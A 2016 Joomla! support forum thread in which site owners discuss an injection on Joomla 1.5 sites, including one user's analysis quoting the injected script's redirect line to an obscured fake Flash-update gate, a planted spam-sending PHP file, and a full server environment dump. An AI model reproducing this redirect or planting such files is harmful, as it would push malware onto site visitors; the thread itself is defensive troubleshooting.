Joined: Thu Sep 13, 2007 11:39 am
Location: UK
Contact:

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by fcoulter » Thu Sep 01, 2016 10:05 pm

Actually I did some more testing, and it seems that the script injected into mod_stats may not be so harmless.

It seems to try to get information about the time zone and screen dimensions and then load itself again with that information supplied in the URL,

If you load the URL [url]http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600[/url], ie with a time zone and screen dimensions then actually it returns this javascript

Code: Select all

window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');
That URL which I have obscured is a fake Adobe update site, it is most likely trying to produce a fake Flash update notice to try to trick users into downloading malware, if it is not working then that is just good luck on our part.

rogeriovaz
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Fri Sep 02, 2016 8:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by rogeriovaz » Fri Sep 02, 2016 8:18 am

Hi guys,

I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you however I realised that the website is sending emails constantly to all clients and employees.
Have someone found a solution for it?
Follow my FPA
Problem Description :: Forum Post Assistant (v1.2.7) : 2nd September 2016 wrote:Suddenly my website starts to send email for everyone of my clients and even the emploeeys.
Forum Post Assistant (v1.2.7) : 2nd September 2016 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Writable (755) | Owner: fosseway (uid: 1/gid: 1) | Group: fosseway (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 1 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: 0 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-504.12.2.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/fosseway/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.4.44 | PHP API: cgi-fcgi | Session Path Writable: No | Display Errors: 1 | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 2M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 30 | Memory Limit: 128M

MySQL Configuration :: Version: 5.6.31 (Client:mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 49.00 MiB | #of Tables:  119
Detailed Environment :: wrote:PHP Extensions :: Core (5.4.44) | date (5.4.44) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7) | zlib (2.0) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | fileinfo (1.0.5) | filter (0.11.0) | ftp () | gd () | hash (1.0) | iconv () | SPL (0.2) | json (1.2.1) | mbstring () | mcrypt () | session () | standard (5.4.44) | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | mysqli (0.1) | Phar (2.0.1) | posix () | Reflection ($Id: f6367cdb4e3f392af4a6d441a6641de87c2e50c4 $) | mysql (1.0) | SimpleXML (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) ::
Extensions Discovered :: wrote:Components :: SITE :: User (1.5.0) | MailTo (1.5.0) | default (1.0.0) | Wrapper (1.5.0) | Froogle (1.0.0) |
Components :: ADMIN :: Template Manager (1.5.0) | Weblinks (1.5.0) | Polls (1.5.0) | Language Manager (1.5.0) | Smart Former (2.4.0) | Control Panel (1.5.0) | VirtueMart (1.1.4) | sh404sef (2.0.1.531) | sh404sef - System mobile templ (1.0.0.531) | sh404sef - System plugin (2.0.1.531) | J16 Language backport - system (1.0.0.531) | sh404sef - Similar urls plugin (2.0.1.531) | Newsfeeds (1.5.0) | User Manager (1.5.0) | swMenuPro (6.5) | Banners (1.5.0) | Mass Mail (1.5.0) | Media Manager (1.5.0) | Cache Manager (1.5.0) | Instantsearch (1) | Content Page (1.5.0) | Search (1.5.0) | Messaging (1.5.0) | Module Manager (1.5.0) | Configuration Manager (1.5.0) | Plugin Manager (1.5.0) | JoomlaPack (2.1) | Froogle (1.0.0) | Frontpage (1.5.0) | Trash (1.0.0) | Installation Manager (1.5.0) | Contact Items (1.0.0) | Menus Manager (1.5.0) |

Modules :: SITE :: Poll (1.5.0) | VirtueMart Currency Selector (1.1.0) | Related Items (1.0.0) | Who\'s Online (1.0.0) | Custom HTML (1.5.0) | Random Image (1.5.0) | VirtueMart Search (1.1.0) | VirtueMart Random Products (1.1.0) | Sections (1.5.0) | VirtueMart Featured Products (1.1.0) | Archived Content (1.5.0) | Extended Menu (1.0.6 (build ) | SmartFormer (1.5.0) | swMenuPro (6.5) | Search (1.0.0) | Random Products (1.5.0) | VirtueMart Shopping Cart (1.1.0) | VirtueMart Login (1.1.4) | Statistics (1.5.0) | Latest News (1.5.0) | Menu (1.5.0) | VirtueMart Product Categories (1.1.0) | Wrapper (1.0.0) | VirtueMart Module (1.1.4) | VirtueMart Manufacturers (1.1.0) | VirtueMart Top Ten Products (1.1.0) | VirtueMart Latest Products (1.1.0) | Syndicate (1.5.0) | Footer (1.5.0) | Most Read Content (1.5.0) | Newsflash (1.5.0) | Feed Display (1.5.0) | Banner (1.5.0) | VirtueMart Product Scroller (1.1.0) | Breadcrumbs (1.5.0) | Login (1.5.0) |
Modules :: ADMIN :: Latest News (1.0.0) | Title (1.0.0) | Custom HTML (1.5.0) | Popular Items (1.0.0) | User Status (1.5.0) | Admin Submenu (1.0.0) | Logged in Users (1.0.0) | Items Stats (1.0.0) | Online Users (1.0.0) | Footer (1.0.0) | Unread Items (1.0.0) | Feed Display (1.5.0) | Admin Menu (1.0.0) | Toolbar (1.0.0) | Quick Icons (1.0.0) | Login Form (1.0.0) |

Plugins :: SITE :: Button - Image (1.0.0) | Button - Pagebreak (1.5) | Button - Readmore (1.5) | Search - Content (1.5) | Search - Contacts (1.5) | Search - Weblinks (1.5) | Search - Newsfeeds (1.5) | Search - Categories (1.5) | Search - Sections (1.5) | Virtuemart Extended Search Plu (1.5) | System - LazyDbBackup (1.5.4b) | System - SEF (1.5) | System - Cache (1.5) | System - Mootools Upgrade (1.5) | System - Log (1.5) | System - Backlinks (1.5) | System - Remember Me (1.5) | sh404sef - System mobile templ (1.0.0.531) | Azrul System Mambot For Joomla (2.7) | System - Google Analytics Trac (1.2.3) | sh404sef - System plugin (2.0.1.531) | System - Legacy (1.5) | System - Debug (1.5) | J16 Language backport - system (1.0.0.531) | User - Joomla! (1.5) | User - Example (1.0) | Editor - XStandard Lite for Jo (1.0) | Image Manager (1.5.2) | SpellChecker (2.0.0) | Object Support (1.5.1) | Paste (1.5.3) | File Browser (1.5.0 Stable) | Paste (1.5.0) | Advanced Code Editor (1.5.3) | Joomla! Links for Advanced Lin (1.2.1) | Advanced Link (1.5.1) | Editor - JCE 154 (154) | Editor - TinyMCE 3 (3.2.6) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | sh404sef - Similar urls plugin (2.0.1.531) | Authentication - Joomla (1.5) | Authentication - Example (1.5) | Authentication - OpenID (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | VirtueMart Product Snapshot (1.1.0) | Content - Example (1.0) | Content - Smart Former 2.4 (1.5) | Content - Vote (1.5) | Content - Pagebreak (1.5) | Content - Email Cloaking (1.5) | Azrul Videobot (0.1) | Content - Code Highlighter (Ge (1.5) | Content - Page Navigation (1.5) | Content - Load Modules (1.5) |
Templates Discovered :: wrote:Templates :: SITE :: Fosseway (1.0) | Fosseway (1.0) | jTemplate (1.0.3) | beez (1.0.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: Khepri (1.0) |

harps_kal
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 31, 2016 11:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by harps_kal » Fri Sep 02, 2016 1:03 pm

rogeriovaz wrote:Hi guys,
I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you however I realised that the website is sending emails constantly to all clients and employees.
Have someone found a solution for it?
Follow my FPA
The same for me,

The attacker was using a HTPP POST to /libraries/phpxmlrpc/compat/article48.php send spam mail.

also changed the modified date of article48.php so that it wasnt obvious.

Also got some spam email from this forum as soon as I registered.

While I work out what to do I im using a static rip of the joomla site .


Locked

Return to “Security in Joomla! 1.5”